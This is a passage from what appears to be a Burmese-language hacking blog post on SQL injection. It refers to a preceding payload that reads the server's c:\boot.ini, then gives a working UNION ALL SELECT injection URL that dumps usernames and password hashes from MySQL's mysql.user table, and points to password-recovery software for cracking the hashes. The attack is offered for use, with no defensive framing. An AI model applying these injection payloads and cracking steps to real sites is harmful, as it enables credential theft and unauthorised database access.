ဒါဟာ server ရဲ႕ c:\boot.ini ကုိ ဆြဲယူေပးပါလိမ့္မယ္..


---MySQL ROOT---
MySQL version 5 နဲ႔အထက္မွာ mysql.user ဆုိတဲ႔ table တစ္ခုဟာ MySQL servers ေတြမွာရွိပါတယ္... အထဲမွာ hash လုပ္ထားတဲ႔ Password နဲ႔ username ေတြပါ၀င္ပါတယ္... ၄င္းအထဲက

hash ဟာ mysqlsha1 ၿဖစ္တဲ႔အတြက္ John The Ripper နဲ႔ crack လုပ္ဖုိ႔ခက္ပါမယ္..

www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 from mysql.user/*

ဒီအတြက္ InsidePro Password Recovery Software ကုိသုံးလုိ႔ရပါတယ္..
http://www.insidepro.com

Related Posts Plugin for WordPress, Blogger...